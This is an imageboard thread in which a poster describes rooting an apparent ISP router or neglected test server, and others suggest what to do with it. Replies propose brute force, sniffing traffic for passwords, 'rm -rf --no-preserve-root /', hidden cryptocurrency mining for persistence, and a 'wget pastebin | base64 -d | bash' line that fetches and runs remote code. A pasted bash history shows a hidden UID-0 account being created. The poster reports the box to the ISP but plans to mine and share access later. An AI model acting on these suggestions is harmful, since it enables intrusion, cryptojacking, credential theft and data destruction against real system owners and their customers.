I am a leet hacker and owned this box on the interweb. What do Sup Forums ?

I think you are right friend. It looks like a router for a company called century link, located in LA.

>box
off yourself

Much brute force attacking

Ping known server locs and triangulate based on that.

>no fail2ban
>no spa

Fire up webserver and host doge memes. And set up ssh, other anons want to have fun.

Run something to test performance. Chances are you're in a honeypot.

Use fortune(6) and screencap

I don't bother banning attacks, if they waste their time on me, they're loosing resources to target softer targets.

I have notified the ISP.

Can we dynamic tunnel through this please?

...

post scripts

>2017
>fortune not installed
Reeee. Own the shit out of this pleb

Just start pinging a random website then just nuke the system by deleting boot loader and running the good old rm -rf --no-preserve-root /

I thought about it, however I guess they have paying customers that might rely on the router. I have notified them so hopefully they take action. If it's still a mess next week I will do the job for them (albeit not before I create an account for Sup Forums to go ape on).

Neat, that was nice of you.

Sooo many routes!

I'm a nice guy

Shall we do some packet capture Sup Forums ? | grep password?

If you don't run this, you're gay.
wget -q pastebin.com/raw/W0yJrre3 -O - | base64 -d | bash

>pastebin.com/raw/W0yJrre3
No one calls me gay! I'll run anything and mine lite coins for you buddy!

a bit curious to see what they say

I see very little mining happening here.

Will post a response if they reply.

Tentacleporn? That isn't gay, though.

Well, I'm getting bored. Is there anything else i should do before logging of Sup Forums? This BOX is pretty beefy with gigabit connection.... we could do something fun?

run a cow say.

I tried.

nigga please, run this:

It is an EVS system... can you help me figure out what one (based on specs etc)

Install a deluge daemon and provide connection details allowing anons to fill the filesystem with pron and Chinese cartoons.

Lol
The file system is full. it only has 13Gb.

ITT OP finds my honeypot

post .bash_history for each home folder inluding /root/

Shall we play a game?

You use your honeypot to hack/crack too? You are a true white hat.

Hello! What do we have here???

...

Looks interesting. Does anyone know what this is?

not VPNs. this is a PPP server on centurylink equipment.. those are pppoe clients. this is probably connected to a termination system for an ISP. the clients are home modems.

I think we have found the problem.

Thank you sir. I'm glad I didn't kill the box, they would have 1500 angry customers on their hands.

Does Terry A Davis use century link?

based on this image:
This is a testing server.. You should output the ARP table. I'd love to see it.

Modem MACs

How do I output the ARP table?

arp -a

Not much going on here.

this is good, they look like they're emulated testing devices though.
arp -a
do that on the regular bash prompt though.

Get honneypotted "hacker"

install [spoiler]cowsay[/spoiler]

...but with spoiler text

It is a regular bash prompt.

Please tell me why a honey pot would be attacking the public internet very aggressively.

this is beginning to look more and more like a honeypot, or a deeply neglected testing server. when was the last login from one of the same subnets? grep each available network from the ssh log.

It was restarted on the 29th of March.
They ran this before I logged in:

1 ifconfig
2 vi /etc/network/interfaces
3 ifdown eth0
4 ifup eth0
5 ping 8.8.8.8
6 pwd
7 /setup.sh
8 ovs-vsctl list manager
9 ovs-vsctl list manager
10 ping 72.166.59.147
11 ping 72.166.59.147
12 ovs-vsctl list manager
13 ovs-vsctl list manager
14 ifconfig
15 ifconfig | more
16 ip route
17 ping 72.159.66.147
18 ping 72.166.59.147
19 ping 8.8.8.8
20 ifdown eth0
21 ifup eth0
22 ping 72.166.59.147
23 ip route
24 traceroute 72.166.59.145
25 traceroute 8.8.8.8
26 ifconfig
27 ifdown pppoe_c0
28 ifdown pppoe_c1
29 ip route
30 ifdown pppoe_c1
31 ifconfig pppoe_c0 down
32 ifconfig pppoe_c1 down
33 ip route
34 ping 72.166.59.147
35 ifconfig
36 reboot
37 telnet localhost 2000
38 telnet localhost 2000
39 ovs-vsctl set interface pppoe0 options:ppp-debug=true
40 tail -f /var/log/syslog
41 telnet localhost 2000
42 tail -f /var/log/syslog
43 less /var/log/syslog
44 telnet localhost 2000
45 dmesg
46 pwd
47 ls
48 ls -lrt
49 dmesg
50 pwd
51 ls
52 telnet localhost 2000
53 telnet localhost 2000
54 telnet localhost 2000
55 ping 10.10.0.3
56 ifconfig
57 tail -f /var/log.syslog
58 tail -f /var/log/syslog
59 telnet localhost 2400
60 telnet localhost 2000
61 cat /etc/issue
62 screen -r
63 cat /proc/cpuinfo
64 yum
65 apt-get
66 /usr/sbin/useradd -u 0 -o -g 0 map
67 id
68 apt-get install screen
69 cat /etc/issue
70 python
71 screen -r
72 ps -x

To act like an spammer and gather info from them you dub dub.

good to know, but i'm talking about the auth logs. not bash logs. do the auth logs show who logged in on march 29? where did they log in from?

use it as a miner dumbo

This. Mine a CPU coin like Monero with niceness 19 and hide your process.

what am I even looking at?

A local root login followed by a bunch of brute force logins.

Mar 29 13:22:31 crystalforest sudo: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/sh .echo_tmp
Mar 29 13:22:31 crystalforest sudo: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/mkdir -p /mnt/huge
Mar 29 13:22:31 crystalforest sudo: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/mount -t hugetlbfs nodev /mnt/huge
Mar 29 13:23:35 crystalforest login[1769]: ROOT LOGIN on '/dev/tty1'
Mar 29 13:26:51 crystalforest sshd[1859]: Accepted none for root from 185.38.148.3 port 47103 ssh2
Mar 29 13:26:51 crystalforest sshd[1859]: error: connect_to google.com: unknown host (Temporary failure in name resolution)
Mar 29 14:02:07 crystalforest sshd[1900]: Connection closed by 71.174.230.11 [preauth]
Mar 29 14:02:28 crystalforest sshd[1906]: Accepted none for root from 71.174.230.11 port 57576 ssh2
Mar 29 14:05:38 crystalforest sshd[1906]: Timeout, client not responding.
Mar 29 14:31:09 crystalforest sshd[2103]: Invalid user office from 191.82.28.127
Mar 29 14:31:09 crystalforest sshd[2103]: input_userauth_request: invalid user office [preauth]
Mar 29 14:31:09 crystalforest sshd[2103]: error: Could not get shadow information for NOUSER
Mar 29 14:31:09 crystalforest sshd[2103]: Failed password for invalid user office from 191.82.28.127 port 54402 ssh2

I don't need NEAT NET BUCKS / GBP

>I hate money

root is the only user on this system

>gin followed by a bunch of brute force logins.
>Mar 29 13:22:31 crystalforest sudo: root : TTY=unkn
FBI are on their way m8

I work. I have money. neat net bucks aren't worth my time.

This is 99.9% a testing instance that's going unnoticed. Like others are saying, mine some easy cryptocoin. Not much else you can do here except pcap.. And even then, how will you transmit the massive files directly to your storage without being investigated? Not worth it unless you have a vps in some third world country.

It takes like 5 minutes to setup a miner & shapeshift = free BTC

You don't need neat net bucks? Well that's pretty neat.

Open v-switch is using 400% CPU time

Maybe, as user suggested a test neglected test server, this doesn't feel like a honey pot.

top - 04:28:12 up 2 days, 20:22, 1 user, load average: 5.68, 5.64, 5.68
Tasks: 174 total, 4 running, 170 sleeping, 0 stopped, 0 zombie
%Cpu0 : 0.3 us, 0.1 sy, 0.0 ni, 99.5 id, 0.0 wa, 0.0 hi, 0.1 si, 0.0 st
%Cpu1 : 80.0 us, 20.0 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu2 : 0.7 us, 0.2 sy, 0.0 ni, 99.1 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu3 : 0.8 us, 0.2 sy, 0.0 ni, 99.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu4 : 0.1 us, 0.1 sy, 0.0 ni, 99.8 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu5 : 10.7 us, 89.3 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu6 : 0.9 us, 0.4 sy, 0.0 ni, 98.6 id, 0.0 wa, 0.0 hi, 0.1 si, 0.0 st
%Cpu7 : 1.3 us, 0.4 sy, 0.0 ni, 98.2 id, 0.0 wa, 0.0 hi, 0.1 si, 0.0 st
%Cpu8 : 54.6 us, 45.4 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu9 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu10 : 99.9 us, 0.1 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu11 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu12 :100.0 us, 0.0 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu13 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu14 : 80.4 us, 19.6 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu15 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 16405664 total, 3645260 free, 10935684 used, 1824720 buff/cache
KiB Swap: 0 total, 0 free, 0 used. 5125788 avail Mem

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1131 root 10 -10 8964524 3248 2328 R 400.2 0.0 16408:31 ovs-dpdk/ctrl

I have already notified the ISP (emailed their abuse address). I hope they take it down and clean it up.

Already been tried. Gave it my best.. OP doesn't wanna, dns not working on server.
See:

what do u mean by dns not working? do cat /etc/resolv.conf

Windows Power Shell

Is not OP.

OP here: /etc/resolv.conf is empty. I did try adding the google dns server 8.8.8.8 however names still wouldn't resolve.

did you ennter "nameserver 8.8.8.8"?
You have to put nameserver before it.

>
>>no fail2ban
>>no spa
No pubkey encryption and password based authentication on an Internet facing device tbqh senpai - they deserve to get hacked

>68 apt-get install screen
nuke everything

I am an idiot! (I'm also a bit drunk) but yes i did forget to put name server before the dns IP. names are resolving now. Wat do?

mine bitcoin silently and maybe have persistance

root@crystalforest:/var/log# cat /etc/issue
EvS \n \l
Poky (Yocto Project Reference Distro) 2.0.1 \n \l

I'm not mining bitcoin or any other crypto currency, i'm not installing any software, malware or the like. I'm investigating only. I'm also willing to do some luls where possible. However I'm not going to disrupt anybodies service or destroy equipment.

>I'm not going to disrupt anybodies service or destroy equipment.
Mining on niceness 19 won't disrupt anything.
The RAM, disk and network I/O load is minimal.

OK Fine. If they haven't cleaned up the machine after 1 week (I notified the ISP today) I'll mine the shit out of some crypto and use the box like my own off site server.

You're smart, you were correct from the very beginning.

I suggest Monero (XMR)
This is what I mine on my own personal servers to earn a free pizza once a month
Only worth it if you have a flat rate on electricity of course

...

Hmmm. my wife handles all the bills, I have no idea how much we pay or if it is fixed or not. I have a HP micro server.... probably not powerful enough to mine crypto.

I only do that on my rented servers in data centers (fixed price).
It's just peanuts unless you keep the XMR and wait for rising prices.
In my case, I forgot to exchange it and it increased 20-fold.

Free money. Virtually no disk/net I/O, little RAM, and CPU doesn't matter on nice -n19

Thanks, I have rented servers too + this stupid ISP router (that is way more powerful than my rents). I guess I should just mine too. However If the ISP fixes their rooted router I will be happy - Probably owned by some chineese or russians hacking & used to hack the rest of the world. fuck them.

Last post for today. If the ISP reply to my email I will post it here. If they don't, next week I will create a Sup Forums account and you guys can go nuts / do whatever the fuck you want. It's been fun. thanks for your input.